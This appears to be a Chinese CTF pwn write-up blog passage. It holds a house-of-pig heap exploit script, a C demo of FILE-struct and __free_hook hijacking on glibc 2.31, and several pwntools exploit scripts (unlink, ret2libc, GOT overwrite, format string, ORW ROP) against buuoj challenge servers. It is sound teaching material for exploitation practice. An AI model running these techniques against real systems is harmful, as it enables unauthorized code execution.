    io.sendlineafter(b'index: ', str(index).encode())

def edit(index, content):
    io.sendlineafter(b'Choice: ', b'3')
    io.sendlineafter(b'index: ', str(index).encode())
    io.sendafter(b'message: ', content)

def delete(index):
    io.sendlineafter(b'Choice: ', b'4')
    io.sendlineafter(b'index: ', str(index).encode())

def change_role(role):
    global current_user
    io.sendlineafter(b'Choice: ', b'5')
    io.sendlineafter(b'user:\n', password[role])
    current_user = role

# 部署tcache stashing unlink attack的堆环境
change_role(1)
for i in range(5):      # make 5 chunk into tcache, mummy index 0~4
    add(0xA0)
    delete(i)
change_role(0)
add(0x150)    # peppa index 0
for i in range(7):      # fill 0x120 tcache, peppa index 1~7
    add(0x150)
    delete(i + 1)
delete(0)               # peppa #0 into unsorted bin
change_role(1)
add(0xA0)               # mummy index 5, split peppa #0
change_role(0)
add(0x160)              # peppa index 8
for i in range(7):      # fill 0x130 tcache, peppa index 9~15
    add(0x160)
    delete(i + 9)
delete(8)
change_role(1)
change_role(0)
view(8)                 # get libc base address
io.recv(0x10)
libc_base = u64(io.recv(6) + b'\x00\x00') - 0x1ECBE0
system = libc_base + libc.symbols['system']
__free_hook = libc_base + libc.symbols['__free_hook']
_IO_list_all = libc_base + libc.symbols['_IO_list_all']
change_role(1)
add(0xB0)               # mummy index 6, split peppa #8

# 获取堆地址
change_role(0)
change_role(1)
view(1)
io.recv(0x10)
heap_address = u64(io.recv(6) + b'\x00\x00')        # get a heap address

print('libc base: ', hex(libc_base))
print('system: ', hex(system))
print('__free_hook: ', hex(__free_hook))
print('_IO_list_all: ', hex(_IO_list_all))
print('heap address: ', hex(heap_address))

# first large bin attack
change_role(1)
add(0x440)     # mummy index = 7
change_role(0)
add(0x430)     # peppa index = 16
add(0x430)     # peppa index = 17
add(0x430)     # peppa index = 18
add(0x430)     # peppa index = 19
change_role(1)
delete(7)
add(0x450)     # mummy index = 8, switch mummy #7 into large bin
change_role(0)
delete(17)
change_role(1)
change_role(0)
change_role(1)
edit(7, (p64(__free_hook - 0x18 - 0x18) * 2) + b'A' * (0x440 // 0x30 * 0x10 - 0x10))
change_role(2)
add(0xF0)    # daddy index = 0, complete first large bin attack

# second large bin attack
change_role(1)
change_role(0)
delete(19)
change_role(1)
edit(7, (p64(_IO_list_all - 0x20) * 2) + b'A' * (0x440 // 0x30 * 0x10 - 0x10))
change_role(2)
add(0xF0)    # daddy index = 1, complete first large bin attack

# tcache stashing unlink attack
change_role(0)
edit(8, b'0' * 0x40 + p64(heap_address + 0x410) + p64(__free_hook - 0x28) + b'\n')
change_role(2)
add(0x230)   # daddy index = 2
change_role(2)
add(0x430)   # daddy index = 3
change_role(1)
edit(7, p64(heap_address + 0x19E0) * 2 + b'\n')
change_role(2)
add(0xA0)   # daddy index = 4, trigger tcache stashing unlink attack

fake_IO_FILE_complete = p64(0) * 2  # _IO_read_end (0x10), _IO_read_base (0x18)
fake_IO_FILE_complete += p64(1)     # _IO_write_base (0x20)
fake_IO_FILE_complete += p64(0xFFFF_FFFF_FFFF) # _IO_write_ptr (0x28)
fake_IO_FILE_complete += p64(0)     # _IO_write_end (0x30)
fake_IO_FILE_complete += p64(heap_address + 0x19E0 + 0xD0)  # _IO_buf_base (0x38)
fake_IO_FILE_complete += p64(heap_address + 0x19E0 + 0xD0 + 30)  # _IO_buf_end (0x40)
fake_IO_FILE_complete = fake_IO_FILE_complete.ljust(0xB0, b'\x00')
fake_IO_FILE_complete += p64(0)     # _mode (0xB0)
fake_IO_FILE_complete = fake_IO_FILE_complete.ljust(0xC0, b'\x00')
fake_IO_FILE_complete += b'/bin/sh\x00'
fake_IO_FILE_complete += p64(libc_base + 0x1E9560)
payload = fake_IO_FILE_complete + b'/bin/sh\x00' + 2 * p64(system)
io.sendafter(b'Gift:', payload)

io.sendlineafter(b'Choice: ', b'5')
io.sendlineafter(b'user:\n', b'')

io.interactive()

由此，我们就完全解决了house of pig这个问题，但不难发现，这种利用方式需要使用__free_hook，而这个钩子在更高版本的libc中是不存在的。那么在2.35这样的libc中，我们又应该如何进行利用呢？

其实可以发现，house of pig调用了_IO_str_overflow这个函数，如果我们将vtable也进行伪造，就相当于可以执行任意函数。这个函数的第一个参数就是伪造的FILE结构体自身，如果在结构体开头写入字符串/bin/sh，然后通过伪造的vtable调用system函数，也能够实现同样的功能，再不济要是用了沙箱，也还可以用传统手法——setcontext绕一遍，不过那样的话，题目的流程就太长了。

D. glibc 2.31版本house of pig演示程序

下面是笔者写的演示程序，如有错误请联系笔者指正。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BLACK       "30"
#define RED         "31"
#define GREEN       "32"
#define YELLOW      "33"
#define BLUE        "34"
#define PURPLE      "35"
#define GREEN_DARK  "36"
#define WHITE       "37"

#define UNDEFINED   "-1"
#define HIGHLIGHT   "1"
#define UNDERLINE   "4"
#define SPARK       "5"

#define STR_END      "\033[0m"

void printf_color(char* color, char* effect, char* string){
    char buffer[0x1000] = {0};
    strcpy(buffer, "\033[");
    if(effect[0] != '-'){
        strcat(buffer, effect);
        strcat(buffer, ";");
    }
    strcat(buffer, color);
    strcat(buffer, "m");
    strcat(buffer, string);
    printf("%s" STR_END, buffer);
}

int main(){
    printf_color(GREEN, UNDEFINED, "今天我们来学习一下house of pig的利用原理。\n");
    printf_color(GREEN, UNDEFINED, "house of pig在只能使用calloc进行内存分配的CTF赛题中也有用武之地。\n");
    printf_color(GREEN, UNDEFINED, "首先我们了解一下这种利用方式的基本原理。\n");
    printf_color(GREEN, UNDEFINED, "本程序运行于ubuntu 20.04, glibc版本为2.31-0ubuntu9.9。\n");
    printf_color(GREEN, UNDEFINED, "在glibc 2.31下，house of pig需要利用__free__hook。\n\n");
    printf_color(RED, HIGHLIGHT, "第一步：获取libc的加载地址及堆地址。\n");
    printf_color(GREEN, UNDEFINED, "通过puts函数获取libc加载地址，在本libc中其偏移为0x84420。\n");

    size_t puts_addr = (size_t)puts;
    size_t libc_base = puts_addr - 0x84420;
    printf_color(YELLOW, HIGHLIGHT, "libc的加载地址为：");
    printf("\033[" HIGHLIGHT ";" YELLOW "m%#zx\n" STR_END, libc_base);

    printf_color(GREEN, UNDEFINED, "然后我们通过分配一个chunk（大小为0x500）来获得一个堆地址。\n");
    size_t chunk_1 = (size_t) malloc(0x4F0) - 0x10;
    printf_color(YELLOW, HIGHLIGHT, "获得堆地址为这个chunk的起始地址：");
    printf("\033[" HIGHLIGHT ";" YELLOW "m%#zx\n\n" STR_END, chunk_1);

    printf_color(RED, HIGHLIGHT, "第二步：通过large bin attack或其他方法将__free_hook附近写上一个堆地址。\n");
    printf_color(GREEN, UNDEFINED, "为了方便起见，本程序直接对__free_hook附近地址进行修改。\n");
    printf_color(GREEN, UNDEFINED, "在实际应用中，我们要维护好这个堆地址，在后面的步骤中还会用到。\n");
    printf_color(PURPLE, HIGHLIGHT, "这里在__free_hook-0x10处写入刚才获得的堆地址。\n");

    printf_color(GREEN, UNDEFINED, "本libc中__free_hook的偏移为0x1EEE48。\n");

    size_t __free_hook = libc_base + 0x1EEE48;
    printf_color(YELLOW, HIGHLIGHT, "__free_hook的地址为：");
    printf("\033[" HIGHLIGHT ";" YELLOW "m%#zx\n" STR_END, __free_hook);

    size_t* vuln_1 = (size_t*)(__free_hook - 0x8);
    // ---------- 第一处漏洞利用 ---------- //
    *vuln_1 = chunk_1;
    // --------------------------------- //

    printf_color(BLUE, HIGHLIGHT, "第一处漏洞利用完成，已在__free_hook-0x10处写入堆地址。\n\n");

    printf_color(RED, HIGHLIGHT, "第三步：通过large bin attack或其他方法向_IO_list_all写入一个堆地址。\n");
    printf_color(GREEN, UNDEFINED, "本libc中__free_hook的偏移为0x1ED5A0。\n");

    size_t* _IO_list_all = (size_t*)(libc_base + 0x1ED5A0);

    printf_color(GREEN, UNDEFINED, "_IO_list_all中原本保存的应该是_IO_2_1_stderr_这个文件结构体实例。\n");
    printf_color(GREEN, UNDEFINED, "在程序调用exit函数时会对_IO_list_all中的FILE结构体依次进行遍历。\n");
    printf_color(GREEN, UNDEFINED, "exit函数的调用链为：exit->_IO_cleanup->_IO_flush_all_lockp。\n");
    printf_color(GREEN, UNDEFINED, "下面是_IO_flush_all_lockp的函数定义：\n\n");
    printf_color(BLUE, HIGHLIGHT, "(/libio/genops.c， line 684)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "int\n"
                 "_IO_flush_all_lockp (int do_lock)\n"
                 "{\n"
                 "  int result = 0;\n"
                 "  FILE *fp;\n"
                 "\n"
                 "#ifdef _IO_MTSAFE_IO\n"
                 "  _IO_cleanup_region_start_noarg (flush_cleanup);\n"
                 "  _IO_lock_lock (list_all_lock);\n"
                 "#endif\n"
                 "\n"
                 "  \033[1;31mfor (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)\n"
                 "    {\n"
                 "      run_fp = fp;\n"
                 "      if (do_lock)\n"
                 "\t_IO_flockfile (fp);\n"
                 "\n"
                 "      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)\n"
                 "\t   || (_IO_vtable_offset (fp) == 0\n"
                 "\t       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr\n"
                 "\t\t\t\t    > fp->_wide_data->_IO_write_base))\n"
                 "\t   )\n"
                 "\t  && _IO_OVERFLOW (fp, EOF) == EOF)\n"
                 "\tresult = EOF;\n"
                 "\n"
                 "      if (do_lock)\n"
                 "\t_IO_funlockfile (fp);\n"
                 "      run_fp = NULL;\n"
                 "    }\n\033[1;" PURPLE "m"
                 "\n"
                 "#ifdef _IO_MTSAFE_IO\n"
                 "  _IO_lock_unlock (list_all_lock);\n"
                 "  _IO_cleanup_region_end (0);\n"
                 "#endif\n"
                 "\n"
                 "  return result;\n"
                 "}\n\n");
    printf_color(GREEN, UNDEFINED, "注意红色部分的代码，这便是遍历_IO_list_all链中的所有FILE实例。\n");
    printf_color(GREEN, UNDEFINED, "其中一条if语句的判断条件中会调用_IO_OVERFLOW函数。\n");
    printf_color(GREEN, UNDEFINED, "这个函数指的是vtable中overflow那个字段对应的函数。\n");
    printf_color(GREEN, UNDEFINED, "要执行到这个函数，就必须要让前面一个判断条件满足。\n");
    printf_color(GREEN, UNDEFINED, "这也就是我们伪造FILE结构体时需要注意的地方。\n");
    printf_color(GREEN, UNDEFINED, "下面我们就来修改_IO_list_all的值，用一个chunk地址填充。\n");

    size_t chunk_2 = (size_t) calloc(1, 0xF0) - 0x10;
    // ---------- 第二处漏洞利用 ---------- //
    *_IO_list_all = chunk_2;
    // --------------------------------- //
    printf_color(YELLOW, HIGHLIGHT, "这个chunk的起始地址为：");
    printf("\033[" HIGHLIGHT ";" YELLOW "m%#zx\n" STR_END, chunk_2);

    printf_color(RED, HIGHLIGHT, "第四步：伪造FILE结构体。\n");
    printf_color(GREEN, UNDEFINED, "我们使用第二次分配到的chunk作为假FILE结构体进行构造。\n");
    printf_color(GREEN, UNDEFINED, "再次强调注意_IO_flush_all_lockp函数的限定条件。\n");
    printf_color(GREEN, UNDEFINED, "if语句的前一个判断条件是两个判断相或，我们只需要满足第一个判断即可：\n");
    printf_color(RED, HIGHLIGHT, "fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base\n");
    printf_color(GREEN, UNDEFINED, "其中_mode字段的偏移为0xC0，_IO_write_ptr为0x28，_IO_write_base为0x30。\n");
    printf_color(GREEN, UNDEFINED, "我们在_mode处填0，在_IO_write_ptr填1，在_IO_write_base填0就可以了。\n");

    size_t* fake_FILE = (size_t*) chunk_2;
    fake_FILE[0xC0 / 8] = 0;    // _mode
    fake_FILE[0x20 / 8] = 1;
    fake_FILE[0x28 / 8] = 0xFFFFFFFFFFFF;    // _IO_write_ptr
    fake_FILE[0x30 / 8] = 0;    // _IO_write_base

    printf_color(GREEN, UNDEFINED, "三个字段修改完成。但我们需要修改的可不止这三个字段。\n");
    printf_color(GREEN, UNDEFINED, "在这个判断条件通过后，我们将会进入overflow函数。\n");
    printf_color(GREEN, UNDEFINED, "house of pig的一个重要思想就是让其执行_IO_str_overflow函数。\n");
    printf_color(GREEN, UNDEFINED, "这需要我们在vtable中写入_IO_str_jumps的地址，其中保存有这个函数的地址。\n");
    printf_color(GREEN, UNDEFINED, "看一下IDA中的_IO_str_jumps结构体：\n\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "__libc_IO_vtables:00000000001E9560 qword_1E9560    dq 0                    ; DATA XREF: sub_52C20+49A↑o\n"
                 "__libc_IO_vtables:00000000001E9560                                         ; sscanf+B5↑o ...\n"
                 "__libc_IO_vtables:00000000001E9568                 dq 0\n"
                 "__libc_IO_vtables:00000000001E9570                 dq offset sub_93D50\n"
                 "\033[1;31m__libc_IO_vtables:00000000001E9578                 dq offset _IO_str_overflow\n\033[1;" PURPLE "m"
                 "__libc_IO_vtables:00000000001E9580                 dq offset _IO_str_underflow\n"
                 "__libc_IO_vtables:00000000001E9588                 dq offset _IO_default_uflow\n"
                 "__libc_IO_vtables:00000000001E9590                 dq offset _IO_str_pbackfail\n"
                 "__libc_IO_vtables:00000000001E9598                 dq offset _IO_default_xsputn\n"
                 "__libc_IO_vtables:00000000001E95A0                 dq offset _IO_default_xsgetn\n"
                 "__libc_IO_vtables:00000000001E95A8                 dq offset _IO_str_seekoff\n"
                 "__libc_IO_vtables:00000000001E95B0                 dq offset sub_92600\n"
                 "__libc_IO_vtables:00000000001E95B8                 dq offset sub_924E0\n"
                 "__libc_IO_vtables:00000000001E95C0                 dq offset sub_92870\n"
                 "__libc_IO_vtables:00000000001E95C8                 dq offset _IO_default_doallocate\n"
                 "__libc_IO_vtables:00000000001E95D0                 dq offset sub_937F0\n"
                 "__libc_IO_vtables:00000000001E95D8                 dq offset sub_93800\n"
                 "__libc_IO_vtables:00000000001E95E0                 dq offset sub_937D0\n"
                 "__libc_IO_vtables:00000000001E95E8                 dq offset sub_92870\n"
                 "__libc_IO_vtables:00000000001E95F0                 dq offset sub_937E0\n"
                 "__libc_IO_vtables:00000000001E95F8                 dq offset sub_93810\n"
                 "__libc_IO_vtables:00000000001E9600                 dq offset sub_93820\n\n");

    printf_color(GREEN, UNDEFINED, "其偏移为0x1E9560。将其填充到vtable字段，偏移为0xD8。\n");
    size_t _IO_str_jumps = libc_base + 0x1E9560;
    fake_FILE[0xD8 / 8] = _IO_str_jumps;

    printf_color(GREEN, UNDEFINED, "然后，我们进入_IO_str_overflow函数看看。\n\n");
    printf_color(BLUE, HIGHLIGHT, "(/libio/strops.c, line 80)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "int\n"
                 "_IO_str_overflow (FILE *fp, int c)\n"
                 "{\n"
                 "  int flush_only = c == EOF;\n"
                 "  size_t pos;\n"
                 "  if (fp->_flags & _IO_NO_WRITES)\n"
                 "      return flush_only ? 0 : EOF;\n"
                 "  if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))\n"
                 "    {\n"
                 "      fp->_flags |= _IO_CURRENTLY_PUTTING;\n"
                 "      fp->_IO_write_ptr = fp->_IO_read_ptr;\n"
                 "      fp->_IO_read_ptr = fp->_IO_read_end;\n"
                 "    }\n"
                 "  pos = fp->_IO_write_ptr - fp->_IO_write_base;\n"
                 "  if (pos >= (size_t) (_IO_blen (fp) + flush_only))\n"
                 "    {\n"
                 "      if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */\n"
                 "\treturn EOF;\n"
                 "      else\n"
                 "\t{\n"
                 "\033[1;31m\t  char *new_buf;\n"
                 "\t  char *old_buf = fp->_IO_buf_base;\n"
                 "\t  size_t old_blen = _IO_blen (fp);\n"
                 "\t  size_t new_size = 2 * old_blen + 100;\n"
                 "\t  if (new_size < old_blen)\n"
                 "\t    return EOF;\n"
                 "\t  new_buf = malloc (new_size);\n"
                 "\t  if (new_buf == NULL)\n"
                 "\t    {\n"
                 "\t      /*\t  __ferror(fp) = 1; */\n"
                 "\t      return EOF;\n"
                 "\t    }\n"
                 "\t  if (old_buf)\n"
                 "\t    {\n"
                 "\t      memcpy (new_buf, old_buf, old_blen);\n"
                 "\t      free (old_buf);\n"
                 "\t      /* Make sure _IO_setb won't try to delete _IO_buf_base. */\n"
                 "\t      fp->_IO_buf_base = NULL;\n"
                 "\t    }\n\033[1;" PURPLE "m"
                 "\t  memset (new_buf + old_blen, '\\0', new_size - old_blen);\n"
                 "\n"
                 "\t  _IO_setb (fp, new_buf, new_buf + new_size, 1);\n"
                 "\t  fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);\n"
                 "\t  fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);\n"
                 "\t  fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);\n"
                 "\t  fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);\n"
                 "\n"
                 "\t  fp->_IO_write_base = new_buf;\n"
                 "\t  fp->_IO_write_end = fp->_IO_buf_end;\n"
                 "\t}\n"
                 "    }\n"
                 "\n"
                 "  if (!flush_only)\n"
                 "    *fp->_IO_write_ptr++ = (unsigned char) c;\n"
                 "  if (fp->_IO_write_ptr > fp->_IO_read_end)\n"
                 "    fp->_IO_read_end = fp->_IO_write_ptr;\n"
                 "  if (flush_only)\n"
                 "    return 0;\n"
                 "  else\n"
                 "    return c;\n"
                 "}\n\n");

    printf_color(GREEN, UNDEFINED, "注意红色部分的代码，这里会连续调用malloc、memcpy、free函数。\n");
    printf_color(GREEN, UNDEFINED, "house of pig想要在这里大做文章。\n");
    printf_color(GREEN, UNDEFINED, "首先需要通过tcache stashing unlink attack或其他方法向tcache中插入__free_hook附近的地址。\n");
    printf_color(GREEN, UNDEFINED, "然后在运行到此时，首先通过malloc分配出来，然后memcpy将指定位置的内容复制到__free_hook。\n");
    printf_color(GREEN, UNDEFINED, "最后通过free函数执行__free_hook中的内容，这里将__free_hook修改为system函数地址。\n");
    printf_color(GREEN, UNDEFINED, "通过代码我们可以知道，memcpy是将_IO_buf_base（结构体内偏移0x38）地址处的内容复制到__free_hook。\n");
    printf_color(GREEN, UNDEFINED, "而这个复制的原地址是我们可控的，需要我们在伪造的FILE结构体中设置。\n");
    printf_color(GREEN, UNDEFINED, "这里我们设置这个地址的值为第一个chunk的地址+0x20。\n");
    printf_color(GREEN, UNDEFINED, "............\n");

    fake_FILE[0x38 / 8] = chunk_1 + 0x20;

    printf_color(GREEN, UNDEFINED, "设置完成。之后我们需要注意malloc函数申请的chunk大小，其申请的大小需要经过计算。\n");
    printf_color(GREEN, UNDEFINED, "计算方式是：(_IO_buf_end - _IO_buf_base) * 2 + 100。\n");
    printf_color(GREEN, UNDEFINED, "这要求我们正确设置_IO_buf_end的值。如果使用0x100的tcache进行攻击，则end-base=0x46。\n");
    printf_color(GREEN, UNDEFINED, "据此设置_IO_buf_end为第一个chunk的地址+0x20+0x46（结构体内偏移0x40）。\n");
    printf_color(GREEN, UNDEFINED, "............\n");

    fake_FILE[0x40 / 8] = chunk_1 + 0x20 + 0x46;

    printf_color(GREEN, UNDEFINED, "设置完成。最后注意free函数的参数是FILE结构体的起始地址，因此在第二个chunk+0x20处写入\"/bin/sh\\x00\"。\n");
    printf_color(GREEN, UNDEFINED, "另外在第二个chunk+0x30处写入system函数地址，memcpy函数能够将这里的地址复制到__free_hook。\n");

    strcpy((char*)(chunk_1 + 0x20), "/bin/sh");
    *(size_t*)(chunk_1 + 0x20 + 0x10) = (size_t)system;

    printf_color(GREEN, UNDEFINED, "............\n");
    printf_color(GREEN, UNDEFINED, "设置完成。\n\n");

    printf_color(RED, HIGHLIGHT, "第五步：通过tcache stashing unlink attack在tcache写入__free_hook附近地址。\n");
    printf_color(GREEN, UNDEFINED, "当赛题中只使用calloc时，只有在tcache中存放堆地址，才能让malloc分配到__free_hook。\n");
    printf_color(GREEN, UNDEFINED, "下面进行这种攻击的常规流程：\n");
    printf_color(GREEN, UNDEFINED, "首先分配9个chunk并释放，7个到tcache，2个到small bins。然后分配两个tcache chunk出来。\n");

    void* chunks[9];

    for(int i=0; i<7; i++)
        chunks[i] = malloc(0xF0);
    malloc(0x20);   // to avoid consolidate
    chunks[7] = malloc(0xF0);
    malloc(0x20);   // to avoid consolidate
    chunks[8] = malloc(0xF0);
    malloc(0x20);   // to avoid consolidate
    for(int i=0; i<9; i++)
        free(chunks[i]);
    malloc(0xF0);
    malloc(0xF0);
    malloc(0x100);

    printf_color(GREEN, UNDEFINED, "依次释放9个chunk，tcache中的chunk应该为：7->6->5->4->3->2->1。\n");
    printf_color(GREEN, UNDEFINED, "unsorted bin中的chunk应该为：9<->8。\n");
    printf_color(GREEN, UNDEFINED, "然后分配出来两个tcache chunk，再分配一个较大的chunk，让unsorted bin的两个chunk进入small bins。\n");
    printf_color(GREEN, UNDEFINED, "应该修改第9个chunk的bk指针为__free_hook附近地址。\n");
    printf_color(GREEN, UNDEFINED, "............\n");

    *(size_t*)((size_t)(chunks[8]) + 0x8) = __free_hook - 0x20;

    printf_color(GREEN, UNDEFINED, "修改完成，之后分配一个出来进行攻击。\n");
    calloc(1, 0xF0);

    printf_color(GREEN, UNDEFINED, "已经分配出来了一个chunk，现在0x100的tcache中的第一个chunk就是__free_hook附近的地址。\n\n");

    printf_color(RED, HIGHLIGHT, "第六步：调用exit函数触发house of pig漏洞。\n");
    printf_color(GREEN, UNDEFINED, "现在，所有的东西都已经布置好了，只需要一个exit函数，我们就能够执行预期的函数调用链并getshell。\n");
    exit(-1);
}

buuctf-pwn write-ups (10)

发表于 2023-02-28 更新于 2023-03-04 分类于 write-ups ， buuctf 系列
本文字数： 10k 阅读时长 ≈ 9 分钟

buu073-hitcontraining_bamboobox

数据结构：

共可申请100个结构，其中change_item函数有任意长度堆溢出漏洞。

本题程序加载地址固定，itemlist地址固定，因此考虑使用unlink方法解题。

unlink之后可以直接通过第一个chunk读取到stdin的地址，从而获取libc加载基址。
需要注意的是这里修改的是atoi函数的got表地址，如果修改free函数的got表地址，由于输入时程序会将输入的后面一个字节清零，会导致free函数got表后面的一个地址（puts）发生错误，使得menu函数调用puts函数失败。而atoi后面是exit函数地址，无关紧要。

from pwn import *
from LibcSearcher import *
context(arch='amd64', log_level='debug')
# io = process('./pwn')
io = remote('node4.buuoj.cn', 29731)
elf = ELF('./pwn')

def add(length, content):
    io.sendlineafter(b'Your choice:', b'2')
    io.sendlineafter(b'Please enter the length of item name:', str(length).encode())
    io.sendafter(b'Please enter the name of item:', content)

def show():
    io.sendlineafter(b'Your choice:', b'1')

def change(index, length, content):
    io.sendlineafter(b'Your choice:', b'3')
    io.sendlineafter(b'Please enter the index of item:', str(index).encode())
    io.sendlineafter(b'Please enter the length of item name:', str(length).encode())
    io.sendafter(b'Please enter the new name of the item:', content)

def delete(index):
    io.sendlineafter(b'Your choice:', b'4')
    io.sendlineafter(b'Please enter the index of item:', str(index).encode())

add(0x88, b'colin')     # chunk #0
add(0x88, b'colin')     # chunk #1
add(0x20, b'/bin/sh')   # chunk #2
payload = p64(0x10)
payload += p64(0x81)
payload += p64(0x6020C8 - 0x18)
payload += p64(0x6020C8 - 0x10)
payload += cyclic(0x60)
payload += p64(0x80)
payload += p64(0x90)
change(0, 0x90, payload)
delete(1)
show()
io.recv(4)
stdin = u64(io.recv(6) + b'\x00\x00')
print(hex(stdin))
libc = LibcSearcher('_IO_2_1_stdin_', stdin)
base = stdin - libc.dump('_IO_2_1_stdin_')
sys = base + libc.dump('system')
change(0, 0x20, p64(stdin) + p64(0) + p64(0x88) + p64(elf.got['atoi']))
change(0, 0x8, p64(sys))
io.sendline(b'/bin/sh')
io.interactive()

buu074-cmcc_pwnme2

简单的栈溢出，题目给的拼接字符串的函数里面的路径是错的，不需要用，直接输出got表然后get shell即可。

from pwn import *
from LibcSearcher import *
context.log_level='debug'

# io = process("./pwnme2")
io = remote("node4.buuoj.cn", 29174)
elf = ELF("./pwnme2")

payload = cyclic(0x70)
payload += p32(elf.plt['puts'])
payload += p32(elf.symbols['main'])
payload += p32(elf.got['puts'])

io.sendlineafter('Please input:', payload)
io.recvuntil(b'Hello')
io.recvuntil(b'\n')
puts = u32(io.recv(4))
print(hex(puts))
libc = LibcSearcher('puts', puts)
base = puts - libc.dump('puts')
system = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')
print(hex(binsh))

payload = cyclic(0x70)
payload += p32(system)
payload += p32(elf.symbols['main'])
payload += p32(binsh)
io.sendlineafter('Please input:', payload)

io.interactive()

buu075-picoctf_2018_got-shell

在修改后还调用了puts函数，因此只需要将puts函数的got表内容改成win函数地址即可。

from pwn import *
context.log_level = 'debug'
# io = process('./PicoCTF_2018_got-shell')
io = remote('node4.buuoj.cn', 27364)
elf = ELF('./PicoCTF_2018_got-shell')
target = elf.got['puts']
value = elf.symbols['win']

io.sendlineafter(b'value?\n', hex(target)[2:].encode())
io.sendlineafter(hex(target)[2:].encode(), hex(value)[2:].encode())

io.interactive()

buu076-npuctf_2020_easyheap

增删改查四个功能，其中增加只能增加大小为0x20或0x40的堆块。改功能有off by one漏洞。

本题环境是2.27，因此释放的堆块都会在tcache中保存。而要想tcache中的堆块被重新分配，其大小就必须是0x20或0x40。如果使用off by one漏洞修改一个堆块的size，则必须在其正在使用时修改，否则当堆块释放时修改大小，在重新分配时无法通过检查。至于大小的修改，有两种可能：改大或改小。

如果改大，则只能从0x20改为0x40，修改后的大小如果不为0x40，在释放后将无法被重新分配。如果改小，可以从0x40改为0x20，后面的部分由于可以控制，因此可以伪造成一个假chunk。

这里选择的是改大。如何改？首先想象这样的堆排布：三个0x20的chunk，前面2个都是用作buffer，后面一个用于heaparray结构，现在通过edit第1个chunk将第2个chunk的大小改成0x40，再释放第2、3个chunk，就会产生chunk重叠，之后再重新分配回来，就可以通过edit随意修改heaparray中的指针，进而实现任意地址写。本题中最方便的就是改到free的got表位置，通过show获取libc地址，然后将这里的值改成system函数地址，直接delete即可get shell。

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
# io = process("npuctf_2020_easyheap")
io = remote('node4.buuoj.cn', 29065)
elf = ELF("npuctf_2020_easyheap")

sla = lambda x, y: io.sendlineafter(x, y)
sa = lambda x, y: io.sendafter(x, y)

def create_heap(size, content):
	sla(b'Your choice :', b'1')
	sla(b'Size of Heap(0x10 or 0x20 only) : ', str(size).encode())
	sla(b'Content:', content)
	
def edit_heap(index, content):
	sla(b'Your choice :', b'2')
	sla(b'Index :', str(index).encode())
	sla(b'Content: ', content)

def show_heap(index):
	sla(b'Your choice :', b'3')
	sla(b'Index :', str(index).encode())
	
def delete_heap(index):
	sla(b'Your choice :', b'4')
	sla(b'Index :', str(index).encode())

create_heap(0x18, cyclic(0x38))	# 0
create_heap(0x18, cyclic(0x18))	# 1
create_heap(0x18, cyclic(0x18))	# 2
delete_heap(0)
edit_heap(1, b'/bin/sh'.ljust(0x18, b'\x00') + p8(0x41))
delete_heap(2)
create_heap(0x38, b'/bin/sh'.ljust(0x18, b'\x00') + p64(0x21) + p64(0x38) + p64(elf.got['free']))
show_heap(0)
io.recvuntil(b'Content : ')
free = u64(io.recv(6) + b'\x00\x00')
print(hex(free))
libc = LibcSearcher('free', free)
base = free - libc.dump('free')
print(hex(base))
system = base + libc.dump('system')
edit_heap(0, p64(system))
delete_heap(1)
io.interactive()

buu077-wdb_2018_2nd_easyfmt

这题在bugku上也有，好像是叫pwn07，简单的格式化字符串漏洞，不多解释了。

from pwn import *
from LibcSearcher import *
context(arch='i386', os='linux', log_level='debug')

elf = ELF('./pwn')

io = remote('node4.buuoj.cn', 29596)
# io = process('./pwn')
io.recvuntil(b'Do you know repeater?\n')

payload1 = p32(elf.got['read']) + b'%6$s'
io.send(payload1)

mem_read_addr = u32(io.recv()[4:8])

libc = LibcSearcher('read', mem_read_addr)
libc_base = mem_read_addr - libc.dump('read')
mem_sys_addr = libc_base + libc.dump('system')
mem_printf_addr = libc_base + libc.dump('printf')

payload2 = fmtstr_payload(6, {elf.got['printf']: mem_sys_addr}, write_size = 'byte')
io.send(payload2)
io.interactive()	# choose 3rd of libc

buu078-PicoCTF_2018_can-you-gets-me

静态编译的32位程序，没有system函数和字符串/bin/sh，因此通过orw方式读取flag。

from pwn import *
context.log_level = 'debug'

# io = process('./PicoCTF_2018_can-you-gets-me')
io = remote('node4.buuoj.cn', 27340)
elf = ELF('./PicoCTF_2018_can-you-gets-me')

pop4 = 0x809d6f4
write_addr = 0x80EBD20

payload = cyclic(0x18 + 4)
payload += p32(elf.symbols['read'])
payload += p32(pop4)
payload += p32(0)
payload += p32(write_addr)
payload += p32(5)
payload += p32(0)
payload += p32(elf.symbols['open'])
payload += p32(pop4)
payload += p32(write_addr)
payload += p32(0) * 3
payload += p32(elf.symbols['read'])
payload += p32(pop4)
payload += p32(3)
payload += p32(write_addr)
payload += p32(0x30)
payload += p32(0)
payload += p32(elf.symbols['write'])
payload += p32(0)
payload += p32(1)
payload += p32(write_addr)
payload += p32(0x30)

io.sendlineafter(b'GIVE ME YOUR NAME!', payload)
time.sleep(0.5)
io.sendline(b'/flag')
io.interactive()

buu079-mrctf2020_easy_equation

简单的格式化字符串漏洞。

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'

sol = 2
# io = process('./mrctf2020_easy_equation')
io = remote('node4.buuoj.cn', 25629)
elf = ELF('./mrctf2020_easy_equation')

# gdb.attach(io)
# time.sleep(3)
payload = b'a%1c%10$hhnaaaaba' + p64(0x60105C)
print(payload)
io.sendline(payload)
io.interactive()

buu080-ACTF_2019_babystack

这一题本来是只能溢出8个字节，即刚好覆盖返回地址，这种情况可以通过修改rbp的值，返回到leave ; ret指令方法来进行栈迁移。正好本题给出了一个栈地址，就可以利用这个栈地址覆写rbp，然后栈迁移。

